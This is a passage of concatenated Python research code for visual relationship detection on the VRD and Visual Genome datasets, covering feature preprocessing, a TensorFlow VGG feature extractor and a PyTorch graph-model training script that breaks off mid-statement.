sub_feat = np.reshape(np.array(sub_feat), [-1, 4096])
obj_feat = list(map(lambda x: nodes_feat[int(x)], obj_idx))
obj_feat = np.reshape(np.array(obj_feat), [-1, 4096])
sub_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['sub_gt']))
sub_sem = np.reshape(np.array(sub_sem),[-1, 300])
obj_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['obj_gt']))
obj_sem = np.reshape(np.array(obj_sem),[-1, 300])
edge = roidb_use['rela_gt']
sub_node = np.concatenate([sub_feat, sub_sem], 1)
obj_node = np.concatenate([obj_feat, obj_sem], 1)
sub_nodes.append(sub_node)
obj_nodes.append(obj_node)
edges.append(edge)
pbar.update(1)
sub_nodes = np.concatenate(sub_nodes, 0)
obj_nodes = np.concatenate(obj_nodes, 0)
edges = np.concatenate(edges, 0)
assert sub_nodes.shape[0] == edges.shape[0]
return sub_nodes, obj_nodes, edges
sub_nodes_train, obj_nodes_train, edges_train = initial(N_train, train_roidb)
sub_nodes_val, obj_nodes_val, edges_val = initial(N_test, test_roidb)
sub_nodes_test, obj_nodes_test, edges_test = initial(N_test, test_roidb)
pbar.close()
np.save(os.path.join(save_dir, 'instance_sub_nodes_train'), sub_nodes_train)
np.save(os.path.join(save_dir, 'instance_obj_nodes_train'), obj_nodes_train)
np.save(os.path.join(save_dir, 'instance_edges_train'), edges_train)
np.save(os.path.join(save_dir, 'instance_sub_nodes_val'), sub_nodes_val)
np.save(os.path.join(save_dir, 'instance_obj_nodes_val'), obj_nodes_val)
np.save(os.path.join(save_dir, 'instance_edges_val'), edges_val)
np.save(os.path.join(save_dir, 'instance_sub_nodes_test'), sub_nodes_test)
np.save(os.path.join(save_dir, 'instance_obj_nodes_test'), obj_nodes_test)
np.save(os.path.join(save_dir, 'instance_edges_test'), edges_test)
return
def process_vrd_rela_instance_data(save_path):
'''
function: Build the source data for instance-level training
node feature :[num_instance, 4096+300]
edge label: [num_instance, 4096+300]
'''
data_dir = '../data'
save_dir = save_path
predicates_vec = np.load(os.path.join(data_dir, 'predicates_vec.npy'))
objects_vec = np.load(os.path.join(data_dir, 'objects_vec.npy'))
roidb_read = read_roidb(os.path.join(save_dir, 'graph_roidb.npz'))
train_roidb = roidb_read['train']
test_roidb = roidb_read['test']
# ipdb.set_trace()
N_train = len(train_roidb)
N_test = len(test_roidb)
pbar = tqdm(total=N_train+N_test+N_test)
def initial(N, roidb):
sub_nodes = []
obj_nodes = []
edges = []
for i in range(N):
roidb_use = roidb[i]
uni_box = roidb_use['uni_box_gt']
sub_idx = box_id(roidb_use['sub_box_dete'], uni_box)
obj_idx = box_id(roidb_use['obj_box_dete'], uni_box)
nodes_feat = np.load(roidb_use['uni_fc7'])
sub_feat = list(map(lambda x: nodes_feat[int(x)], sub_idx))
sub_feat = np.reshape(np.array(sub_feat), [-1, 4096])
obj_feat = list(map(lambda x: nodes_feat[int(x)], obj_idx))
obj_feat = np.reshape(np.array(obj_feat), [-1, 4096])
# sub_sem = list(map(lambda x: objects_vec[int(x)-1], roidb_use['sub_dete']))
sub_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['sub_dete']))
sub_sem = np.reshape(np.array(sub_sem),[-1, 300])
# obj_sem = list(map(lambda x: objects_vec[int(x)-1], roidb_use['obj_dete']))
obj_sem = list(map(lambda x: objects_vec[int(x)], roidb_use['obj_dete']))
obj_sem = np.reshape(np.array(obj_sem),[-1, 300])
edge = roidb_use['rela_dete']
sub_node = np.concatenate([sub_feat, sub_sem], 1)
obj_node = np.concatenate([obj_feat, obj_sem], 1)
sub_nodes.append(sub_node)
obj_nodes.append(obj_node)
edges.append(edge)
pbar.update(1)
sub_nodes = np.concatenate(sub_nodes, 0)
obj_nodes = np.concatenate(obj_nodes, 0)
edges = np.concatenate(edges, 0)
assert sub_nodes.shape[0] == edges.shape[0]
return sub_nodes, obj_nodes, edges
# sub_nodes_train, obj_nodes_train, edges_train = initial(N_train, train_roidb)
sub_nodes_val, obj_nodes_val, edges_val = initial(N_test, test_roidb)
sub_nodes_test, obj_nodes_test, edges_test = initial(N_test, test_roidb)
pbar.close()
# np.save(os.path.join(save_dir, 'instance_sub_nodes_train'), sub_nodes_train)
# np.save(os.path.join(save_dir, 'instance_obj_nodes_train'), obj_nodes_train)
# np.save(os.path.join(save_dir, 'instance_edges_train'), edges_train)
np.save(os.path.join(save_dir, 'instance_sub_nodes_val'), sub_nodes_val)
np.save(os.path.join(save_dir, 'instance_obj_nodes_val'), obj_nodes_val)
np.save(os.path.join(save_dir, 'instance_edges_val'), edges_val)
np.save(os.path.join(save_dir, 'instance_sub_nodes_test'), sub_nodes_test)
np.save(os.path.join(save_dir, 'instance_obj_nodes_test'), obj_nodes_test)
np.save(os.path.join(save_dir, 'instance_edges_test'), edges_test)
return
def get_path(dataset = 'vg', data_type = 'rela', use_ori_vgg=False):
base_path = '/DATA5_DB8/data/yhu/VTransE/'
if dataset == 'vrd' and data_type == 'pred':
# ---------- vrd pred dataset ---------------#
if use_ori_vgg:
save_path = base_path + 'ori_vrd_vgg_feats'
elif use_random_vgg:
save_path = base_path + 'random_vrd_vgg_feats'
else:
save_path = base_path + 'vrd_vgg_feats'
roidb_path = '../data/vrd_roidb.npz'
elif dataset == 'vrd' and data_type == 'rela':
if use_ori_vgg:
save_path = base_path + 'ori_vrd_rela_vgg_feats'
elif use_random_vgg:
save_path = base_path + 'random_vrd_rela_vgg_feats'
else:
save_path = base_path + 'vrd_rela_vgg_feats'
roidb_path = '../data/vrd_rela_roidb.npz'
elif dataset == 'vg' and data_type == 'pred':
# ----------- vg dataset ---------------#
save_path = base_path + 'vg_vgg_feats'
roidb_path = '../data/vg_roidb.npz'
elif dataset == 'vg' and data_type == 'rela':
# ----------- vg rela dataset ---------------#
save_path = base_path + 'vg_rela_vgg_feats'
roidb_path = '../data/vg_rela_roidb.npz'
return save_path, roidb_path
save_path, roidb_path = get_path(dataset, data_type, use_ori_vgg)
# ============== vrd pred ==============#
# # -------- read data --------------#
roidb_read = read_roidb(roidb_path)
train_roidb = roidb_read['train_roidb']
test_roidb = roidb_read['test_roidb']
# nodes: train | max: 21 | mean: 6.95423280423 | min: 1
# edges: train | max: 34 | mean: 8.03042328042 | min: 1
# nodes: test | max: 20 | mean: 7.00838574423 | min: 2
# edges: test | max: 41 | mean: 8.0 | min: 1
# ----- dsr --------#
# nodes: train | max: 21 | mean: 6.95423280423 | min: 1
# edges: train | max: 30 | mean: 7.89867724868 | min: 1
# nodes: test | max: 20 | mean: 7.00838574423 | min: 2
# edges: test | max: 23 | mean: 7.82809224319 | min: 1
if dataset == 'vrd' and data_type == 'pred':
pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types=70)
process_vrd_pred_instance_data(save_path)
# ============== vrd rela ==============#
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # # ipdb.set_trace()
# # # nodes: train | max: 44 | mean: 14 | min: 1
# # # edges: train | max: 34 | mean: 8 | min: 1
# # # nodes: test | max: 96 | mean: 39.9381551363 | min: 9
# # # edges: test | max: 41 | mean: 8.0 | min: 1
# # dsr test rela
# # nodes: test | max: 63 | mean: 8.071278826 | min: 2
# # edges: test | max: 23 | mean: 8.0 | min: 1
if dataset == 'vrd' and data_type == 'rela':
rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vrd', edges_types=70)
# process_vrd_rela_instance_data(save_path)
# ============== vg pred ==============#
# save_path, roidb_path = get_path('vg', 'pred')
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # nodes: train | max: 98 | mean: 12.9205761986 | min: 1
# # edges: train | max: 490 | mean: 10.8853836355 | min: 1
# # nodes: test | max: 110 | mean: 13.1718230335 | min: 1
# # edges: test | max: 352 | mean: 11.0894500735 | min: 1
if dataset == 'vg' and data_type == 'pred':
pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, dataset='vg', edges_types=100)
# pred_save_vgg_feat(save_path, train_roidb, test_roidb)
# pred_write_feat_into_roidb(save_path, train_roidb, test_roidb, edges_types=100)
# # ============== vg rela ==============#
# save_path, roidb_path = get_path('vg', 'rela')
# # -------- read data --------------#
# roidb_read = read_roidb(roidb_path)
# train_roidb = roidb_read['train_roidb']
# test_roidb = roidb_read['test_roidb']
# # nodes: train | max: 72 | mean: 16.3680922568 | min: 1
# # edges: train | max: 490 | mean: 10.8853836355 | min: 1
# # nodes: test | max: 90 | mean: 28.3761698507 | min: 2
# # edges: test | max: 352 | mean: 11.0894500735 | min: 1
# rela_save_vgg_feat(save_path, train_roidb, test_roidb)
# rela_write_feat_into_roidb(save_path, train_roidb, test_roidb, edges_types=100)
--- FILE SEPARATOR ---
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import losses
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
import numpy as np
from ass_fun import *
import ipdb
import os
class VTranse_Vgg(object):
def __init__(self):
self.predictions = {}
self.losses = {}
self.layers = {}
self.feat_stride = [16, ]
self.scope = 'vgg_16'
def create_graph(self, batch_size, save_path):
# extract subject and object feature
# rela: test and pred: train & test
self.image = tf.placeholder(tf.float32, shape=[1, None, None, 3])
self.sbox = tf.placeholder(tf.float32, shape=[batch_size, 4]) #[x1, y1, x2, y2]
self.obox = tf.placeholder(tf.float32, shape=[batch_size, 4]) #[x1, y1, x2, y2]
self.sub_sp_info = tf.placeholder(tf.float32, shape=[batch_size, 4]) # ???
self.ob_sp_info = tf.placeholder(tf.float32, shape=[batch_size, 4])
# self.rela_label = tf.placeholder(tf.int32, shape=[batch_size,])
self.keep_prob = tf.placeholder(tf.float32)
self.save_path = save_path
self.batch_size = batch_size
self.build_dete_network()
def build_dete_network(self, is_training=True):
# get the region conv and fc features
# the classfication probabilities and ids
net_conv = self.image_to_head(is_training)
net_pool5 = self.crop_bottom_layer(net_conv, "pool5") # [n, 7, 7]
sub_pool5 = self.crop_pool_layer(net_conv, self.sbox, "sub_pool5") # [n, 7, 7]
ob_pool5 = self.crop_pool_layer(net_conv, self.obox, "ob_pool5") # [n, 7, 7]
net_fc7 = self.head_to_tail(net_pool5, is_training, reuse = False) # [n, 4096]
sub_fc7 = self.head_to_tail(sub_pool5, is_training, reuse = True) # [n, 4096]
ob_fc7 = self.head_to_tail(ob_pool5, is_training, reuse = True) # [n, 4096]
# --------new added----------------#
pred_pool5 = self.crop_union_pool_layer(net_conv, self.sbox, self.obox, "pred_pool5") # [n, 7, 7]
# pred_fc7 = self.head_to_tail(pred_pool5, is_training, reuse = True)
pred_fc7 = self.head_to_mean_tail(pred_pool5, is_training, reuse = True)
self.layers['sub_pool5'] = sub_pool5
self.layers['ob_pool5'] = ob_pool5
self.layers['sub_fc7'] = sub_fc7
self.layers['ob_fc7'] = ob_fc7
self.layers['pool5'] = net_pool5
self.layers['fc7'] = net_fc7
# --------new added----------------#
self.layers['pred_pool5'] = pred_pool5
self.layers['pred_fc7'] = pred_fc7
def image_to_head(self, is_training, reuse=False):
with tf.variable_scope(self.scope, self.scope, reuse=reuse):
net = slim.repeat(self.image, 2, slim.conv2d, 64, [3, 3],
trainable=is_training, scope='conv1')
net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool1')
net = slim.repeat(net, 2, slim.conv2d, 128, [3, 3],
trainable=is_training, scope='conv2')
net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool2')
net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3],
trainable=is_training, scope='conv3')
net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')
net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],
trainable=is_training, scope='conv4')
net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')
net_conv = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],
trainable=is_training, scope='conv5')
self.layers['head'] = net_conv
return net_conv
def head_to_tail(self, pool5, is_training, reuse=False):
with tf.variable_scope(self.scope, self.scope, reuse=reuse):
pool5_flat = slim.flatten(pool5, scope='flatten') #[n, 49]
fc6 = slim.fully_connected(pool5_flat, 4096, scope='fc6')
fc6 = slim.dropout(fc6, keep_prob=self.keep_prob, is_training=True,
scope='dropout6')
fc7 = slim.fully_connected(fc6, 4096, scope='fc7')
fc7 = slim.dropout(fc7, keep_prob=self.keep_prob, is_training=True,
scope='dropout7')
return fc7
def head_to_mean_tail(self, pool5, is_training, reuse=False):
mean_fc7 = tf.reduce_mean(tf.reduce_mean(pool5, axis=2), axis=1)
return mean_fc7
def crop_pool_layer(self, bottom, rois, name):
"""
Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.
"""
with tf.variable_scope(name) as scope:
n=tf.to_int32(rois.shape[0])
batch_ids = tf.zeros([n,],dtype=tf.int32)
# Get the normalized coordinates of bboxes
bottom_shape = tf.shape(bottom)
height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.feat_stride[0])
width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.feat_stride[0])
# separate the (x1, y1, x2, y2) of the bounding boxes' coordinates
x1 = tf.slice(rois, [0, 0], [-1, 1], name="x1") / width
y1 = tf.slice(rois, [0, 1], [-1, 1], name="y1") / height
x2 = tf.slice(rois, [0, 2], [-1, 1], name="x2") / width
y2 = tf.slice(rois, [0, 3], [-1, 1], name="y2") / height
# Won't be back-propagated to rois anyway, but to save time
bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], 1)) #[n, 4]
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [7*2, 7*2], method='bilinear',
name="crops")
pooling = max_pool(crops, 2, 2, 2, 2, name="max_pooling")
return pooling
def crop_union_pool_layer(self, bottom, rois_s, rois_o, name):
"""
Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.
"""
with tf.variable_scope(name) as scope:
n=tf.to_int32(rois_s.shape[0])
batch_ids = tf.zeros([n,],dtype=tf.int32)
# Get the normalized coordinates of bboxes
bottom_shape = tf.shape(bottom)
height = (tf.to_float(bottom_shape[1]) - 1.) * np.float32(self.feat_stride[0])
width = (tf.to_float(bottom_shape[2]) - 1.) * np.float32(self.feat_stride[0])
# separate the (x1, y1, x2, y2) of the bounding boxes' coordinates
x1_s = tf.slice(rois_s, [0, 0], [-1, 1], name="x1_s")
y1_s = tf.slice(rois_s, [0, 1], [-1, 1], name="y1_s")
x2_s = tf.slice(rois_s, [0, 2], [-1, 1], name="x2_s")
y2_s = tf.slice(rois_s, [0, 3], [-1, 1], name="y2_s")
x1_o = tf.slice(rois_o, [0, 0], [-1, 1], name="x1_o")
y1_o = tf.slice(rois_o, [0, 1], [-1, 1], name="y1_o")
x2_o = tf.slice(rois_o, [0, 2], [-1, 1], name="x2_o")
y2_o = tf.slice(rois_o, [0, 3], [-1, 1], name="y2_o")
x1 = tf.minimum(x1_s, x1_o, name="x1") / width
y1 = tf.minimum(y1_s, y1_o, name="y1") / height
x2 = tf.maximum(x2_s, x2_o, name="x2") / width
y2 = tf.maximum(y2_s, y2_o, name="y2") / height
# Won't be back-propagated to rois anyway, but to save time
bboxes = tf.stop_gradient(tf.concat([y1, x1, y2, x2], 1)) #[n, 4]
crops = tf.image.crop_and_resize(bottom, bboxes, tf.to_int32(batch_ids), [7*2, 7*2], method='bilinear',
name="crops")
pooling = max_pool(crops, 2, 2, 2, 2, name="max_pooling")
return pooling
def crop_bottom_layer(self, bottom, name):
"""
Notice that the input rois is a N*4 matrix, and the coordinates of x,y should be original x,y times im_scale.
"""
with tf.variable_scope(name) as scope:
# Get the normalized coordinates of bboxes
resized = tf.image.resize_images(bottom, [7*2, 7*2])
pooling = max_pool(resized, 2, 2, 2, 2, name="max_pooling")
return pooling
def extract_pred_fc(self, sess, roidb_use, is_rela=False):
im, im_scale = im_preprocess(roidb_use['image'])
if is_rela:
batch_num = len(roidb_use['index_rela'])/self.batch_size
else:
batch_num = len(roidb_use['index_pred'])/self.batch_size
layers = []
keys = ['pred_pool5', 'pred_fc7', 'pool5', 'fc7', 'sub_fc7', 'ob_fc7']
for k in keys:
check_path_exists(os.path.join(self.save_path, k))
for batch_id in range(np.int32(batch_num)):
if is_rela:
blob = get_blob_rela(roidb_use, im_scale, self.batch_size, batch_id)
else:
blob = get_blob_pred(roidb_use, im_scale, self.batch_size, batch_id)
feed_dict = {self.image: im, self.sbox: blob['sub_box'], self.obox: blob['obj_box'],
self.keep_prob: 1}
layer = sess.run(self.layers, feed_dict = feed_dict)
layer_feat = map(lambda x: layer[x], keys)
layers.append(layer_feat)
pred_pool5 = []
pred_fc7 = []
pool5 = []
fc7 = []
sub_fc7 = []
ob_fc7 = []
for i in range(len(layers)):
pred_pool5.append(layers[i][0])
pred_fc7.append(layers[i][1])
pool5.append(layers[i][2])
fc7.append(layers[i][3])
sub_fc7.append(layers[i][4])
ob_fc7.append(layers[i][5])
pred_pool5 = np.concatenate(pred_pool5, 0)
pred_fc7 = np.concatenate(pred_fc7, 0)
pool5 = np.concatenate(pool5, 0)
fc7 = np.concatenate(fc7, 0)
sub_fc7 = np.concatenate(sub_fc7, 0)
ob_fc7 = np.concatenate(ob_fc7, 0)
if is_rela:
n_total = len(roidb_use['rela_dete'])
else:
n_total = len(roidb_use['rela_gt'])
pred_pool5_full_save_path = os.path.join(self.save_path, 'pred_pool5', os.path.basename(roidb_use['image']))
pred_fc7_full_save_path = os.path.join(self.save_path, 'pred_fc7', os.path.basename(roidb_use['image']))
pool5_full_save_path = os.path.join(self.save_path, 'pool5', os.path.basename(roidb_use['image']))
fc7_full_save_path = os.path.join(self.save_path, 'fc7', os.path.basename(roidb_use['image']))
sub_fc7_full_save_path = os.path.join(self.save_path, 'sub_fc7', os.path.basename(roidb_use['image']))
ob_fc7_full_save_path = os.path.join(self.save_path, 'ob_fc7', os.path.basename(roidb_use['image']))
np.save(pred_pool5_full_save_path, pred_pool5[:n_total])
np.save(pred_fc7_full_save_path, pred_fc7[:n_total])
np.save(pool5_full_save_path, pool5[:n_total])
np.save(fc7_full_save_path, fc7[:n_total])
np.save(sub_fc7_full_save_path, sub_fc7[:n_total])
np.save(ob_fc7_full_save_path, ob_fc7[:n_total])
print("{0} processed!".format(roidb_use['image']))
return
def max_pool(x, h, w, s_y, s_x, name, padding='SAME'):
return tf.nn.max_pool(x, ksize=[1,h,w,1], strides=[1, s_x, s_y, 1], padding=padding, name=name)
--- FILE SEPARATOR ---
from __future__ import division
from __future__ import print_function
import time
import argparse
import pickle
import os
import torch.optim as optim
from torch.optim import lr_scheduler
import torch.nn.functional as F
from modules import *
from eval_metrics import *
from utils import *
from DataLoader import *
import ipdb
from tqdm import tqdm
# from visualize import Visualizer
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False,
help='Disables CUDA training.')
parser.add_argument('--seed', type=int, default=42, help='Random seed.')
parser.add_argument('--epochs', type=int, default=30,
help='Number of epochs to train.')
parser.add_argument('--batch-size', type=int, default=32,
help='Number of samples per batch.')
parser.add_argument('--eval-batch-size', type=int, default=32,
help='Number of samples per batch.')
parser.add_argument('--lr', type=float, default=0.0005,
help='Initial learning rate.')
parser.add_argument('--hidden', type=int, default=512,
help='Number of hidden units.')
parser.add_argument('--num-atoms', type=int, default=110,
help='Number of atoms in simulation.')
parser.add_argument('--rela-num-atoms', type=int, default=63,
help='Number of atoms in simulation.')
parser.add_argument('--num-edges', type=int, default=490,
help='Number of atoms in simulation.')
parser.add_argument('--encoder', type=str, default='simple',
help='Type of path encoder model(simple or nmp).')
parser.add_argument('--dropout', type=float, default=0.5,
help='Dropout rate (1 - keep probability).')
parser.add_argument('--log-interval', type=int, default=5, metavar='N',
help='How many batches to wait before logging.')
parser.add_argument('--edge-types', type=int, default=101,
help='The number of edge types to infer.')
parser.add_argument('--dims', type=int, default=4396,
help='The number of dimensions. 320/4396')
parser.add_argument('--save-folder', type=str, default='./checkpoints/vg',
help='Where to save the trained model.')
parser.add_argument('--load-folder', type=str, default='',
help='Where to load the trained model.')
parser.add_argument('--lr-decay', type=int, default=5,
help='After how epochs to decay LR by a factor of gamma')
parser.add_argument('--gamma', type=float, default=0.5,
help='LR decay factor')
parser.add_argument('--weight', type=float, default=0,
help='Use motion capture data loader.')
parser.add_argument('--mode', type=str, default='whole',
help='Use motion capture data loader.')
parser.add_argument('--restore', action='store_true', default=False,
help='Restore the trained model from the load-folder.')
parser.add_argument('--shuffle', action='store_true', default=False,
help='Shuffle the data in the dataloader.')
parser.add_argument('--feat-mode', type=str, default='full',
help='feature mode: full, vis, or sem')
parser.add_argument('--n-iter', type=int, default=3,
help='How many times of the node edge transfer information.')
parser.add_argument('--prior', action='store_true', default=False,
help='Ranking loss')
parser.add_argument('--tail', type=str, default='base',
help='special name')
parser.add_argument('--ori-vgg', action='store_true', default=False,
help='original vgg')
parser.add_argument('--use-loc', action='store_true', default=False,
help='use location coordinates')
parser.add_argument('--use-cls', action='store_true', default=False,
help='add a classification layer and use the confidence score as feature')
parser.add_argument('--node-types', type=int, default=201,
help='The number of node types to infer.')
# ===================== Args Definition =======================#
args = parser.parse_args()
# vis = Visualizer(env='vg_'+args.encoder+'_'+args.tail)
# ---------- ground truth path --#
graph_path = './data/vg_pred_graph_roidb.npz'
graph_roidb = read_roidb(graph_path)
train_roidb = graph_roidb['train']
val_roidb = graph_roidb['test']
test_roidb = graph_roidb['test']
# ipdb.set_trace()
# ------------------------------------#
if args.feat_mode == 'full':
use_vis = True
use_sem = True
elif args.feat_mode == 'vis':
use_vis = True
use_sem = False
elif args.feat_mode == 'sem':
use_vis = False
use_sem = True
else:
use_vis = False
use_sem = False
print('No feature input')
args.cuda = not args.no_cuda and torch.cuda.is_available()
print(args)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
log = None
# Save model and meta-data. Always saves in a new folder.
if args.save_folder:
if args.restore:
pass
else:
exp_counter = 0
save_folder = os.path.join(args.save_folder, '{}_{}_{}_exp{}'.format(args.encoder, args.feat_mode, \
args.tail, exp_counter))
while os.path.isdir(save_folder):
exp_counter += 1
save_folder = os.path.join(args.save_folder, '{}_{}_{}_exp{}'.format(args.encoder, args.feat_mode, \
args.tail, exp_counter))
os.mkdir(save_folder)
meta_file = os.path.join(save_folder, 'metadata.pkl')
model_file = os.path.join(save_folder, 'temp.pt')
best_model_file = os.path.join(save_folder, 'encoder.pt')
log_file = os.path.join(save_folder, 'log.txt')
log = open(log_file, 'w')
pickle.dump({'args': args}, open(meta_file, "wb"))
print("save_folder: {}".format(save_folder))
else:
print("Save_folder: {}".format(save_folder))
if args.load_folder:
load_folder = os.path.join('./checkpoints/vg', args.encoder +'_'
+ args.feat_mode +'_'+ args.tail + '_' + args.load_folder)
meta_file = os.path.join(load_folder, 'metadata.pkl')
model_file = os.path.join(load_folder, 'temp.pt')
best_model_file = os.path.join(load_folder, 'encoder.pt')
log_file = os.path.join(load_folder, 'log_new.txt')
log = open(log_file, 'w')
pickle.dump({'args': args}, open(meta_file, "wb"))
if args.restore:
save_folder = load_folder
else:
load_folder = save_folder
print("Load_folder: {}".format(load_folder))
# ===================== Model Definition ========================#
if args.encoder == 'simple':
model = SimpleEncoder(args.hidden,
edge_types=args.edge_types, node_types=args.node_types,
do_prob=args.dropout, use_vis=use_vis, use_spatial=False, use_sem=use_sem, use_loc=args.use_loc, use_cls=args.use_cls)
elif args.encoder == 'nmp':
model = NMPEncoder(args.hidden,
edge_types=args.edge_types, node_types=args.node_types, n_iter=args.n_iter,
do_prob=args.dropout, use_vis=use_vis, use_spatial=False, use_sem=use_sem, use_loc=args.use_loc, use_cls=args.use_cls)
if args.cuda:
model.cuda()
# optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=0.0005)
optimizer = optim.RMSprop(model.parameters(), lr=args.lr, alpha=0.99, eps=1e-08, weight_decay=0.0005, momentum=0, centered=False)
scheduler = lr_scheduler.StepLR(optimizer, step_size=args.lr_decay,
gamma=args.gamma)
# --------------- Parameters Loader ------------------#
best_model_params = model.state_dict()
if args.restore:
model.load_state_dict(torch.load(model_file))
# ================== Data Loader ================================#
train_loader, val_loader, test_loader = load_dataset(data_set='vg', ori_vgg=args.ori_vgg, dataset='pred', level='image',
batch_size=args.batch_size, eval_batch_size=args.batch_size,
shuffle=args.shuffle, feat_mode=args.feat_mode)
# ================== Loss Weights ===============================#
cls_ws_train = np.array(np.concatenate([np.ones(args.edge_types-1), [args.weight]],0), dtype=np.float32)
cls_ws_test = np.array(np.concatenate([np.ones(args.edge_types-1), [0]],0), dtype=np.float32)
cls_ws_train = torch.FloatTensor(cls_ws_train)
cls_ws_test = torch.FloatTensor(cls_ws_test)
if args.cuda:
cls_ws_train = cls_ws_train.cuda()
cls_ws_test = cls_ws_test.cuda()
cls_ws_train = Variable(cls_ws_train, requires_grad=False)
cls_ws_test = Variable(cls_ws_test, requires_grad=False)
# =============== iterate one epoch =====================#
def iter_one_epoch(roidb, data_loader, batch_size, is_rela=False, is_training=True):
loss_all = []
recall_50 = 0.0
recall_100 = 0.0
edge_loss_all = []
edge_acc_all = []
node_loss_all = []
node_acc_all = []
pbar = tqdm(total=len(data_loader.dataset))
if is_rela:
num_nodes = args.rela_num_atoms
num_edges = num_nodes * (num_nodes - 1)
else:
num_nodes = args.num_atoms
num_edges = args.num_edges
pred_probs = np.zeros([len(data_loader.dataset), num_edges])
pred_cls = np.zeros([len(data_loader.dataset), num_edges]) + args.edge_types - 1
for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(data_loader):
if args.cuda:
data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
prior = prior.cuda()
node_cls = node_cls.cuda()
bbox_loc = bbox_loc.cuda()
# --------- optimize ------------#
if is_training:
optimizer.zero_grad()
# --------- Forward -----------#
output, node_output = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
output = output.view(-1, args.edge_types)
node_output = node_output.view(-1, args.node_types)
if args.prior:
prior = prior.view(-1, args.edge_types)
rel_score = prior + output
# --------- loss ----------------#
target = target.view(-1)
node_cls = node_cls.view(-1)
if args.prior:
edge_loss = F.multi_margin_loss(rel_score, target, weight=cls_ws_train, size_average=False)
edge_count = args.edge_types / (target < args.edge_types-1).data.sum()
loss = edge_loss * edge_count
else:
edge_loss = F.cross_entropy(output, target, ignore_index=args.edge_types-1)
node_loss = F.cross_entropy(node_output, node_cls, ignore_index=args.node_types-1)
if args.use_cls:
loss = edge_loss + node_loss
else:
loss = edge_loss
# -------- backward --------------#
if is_training:
# vis.plot_many_stack({'train_loss': loss.data.cpu().numpy()[0]})
loss.backward()
optimizer.step()
# ============= accuracy ==============#
# ------ edge acc -------#
edge_acc = compute_acc(output, target, ignored_index=args.edge_types-1)
node_acc = compute_acc(node_output, node_cls, ignored_index=args.node_types-1)
edge_acc_all.append(edge_acc)
node_acc_all.append(node_acc)
loss_all.append(loss.item())
edge_loss_all.append(edge_loss.item())
node_loss_all.append(node_loss.item())
# --------- save ---------------#
output = F.softmax(output, dim=-1)
output = output.view(-1, num_edges, args.edge_types)
pred_prob, pred_cl = output.max(-1)
if (batch_idx+1)*batch_size > len(data_loader.dataset):
pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
else:
pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
pbar.update(batch_size)
pbar.close()
if is_rela:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', topk=False)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=False, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=False, dataset='vg')
else:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', topk=False)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=False, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=False, dataset='vg')
if not is_training:
if is_rela:
head = 'rela_'
else:
head = 'pred_'
np.savez(os.path.join(load_folder, head + 'roidb'), pred_roidb)
return loss_all, edge_loss_all, node_loss_all, edge_acc_all, node_acc_all, recall_50, recall_100, pred_roidb
# =============== Train Op ==============================#
def train(epoch, best_val_accuracy):
t = time.time()
loss_train = []
edge_loss_train = []
node_loss_train = []
edge_acc_train = []
node_acc_train = []
recall_train = 0.0
loss_val = []
edge_loss_val = []
node_loss_val = []
edge_acc_val = []
node_acc_val = []
recall_val = 0.0
rela_loss_val = []
rela_acc_val = []
rela_recall_50 = 0.0
rela_recall_100 = 0.0
model.train()
scheduler.step()
loss_train, edge_loss_train, node_loss_train, edge_acc_train, node_acc_train, recall_train, _, pred_roidb_train = \
iter_one_epoch(train_roidb, train_loader, args.batch_size, is_training=True)
model.eval()
loss_val, edge_loss_val, node_loss_val, edge_acc_val, node_acc_val, recall_val, _, pred_roidb_val = \
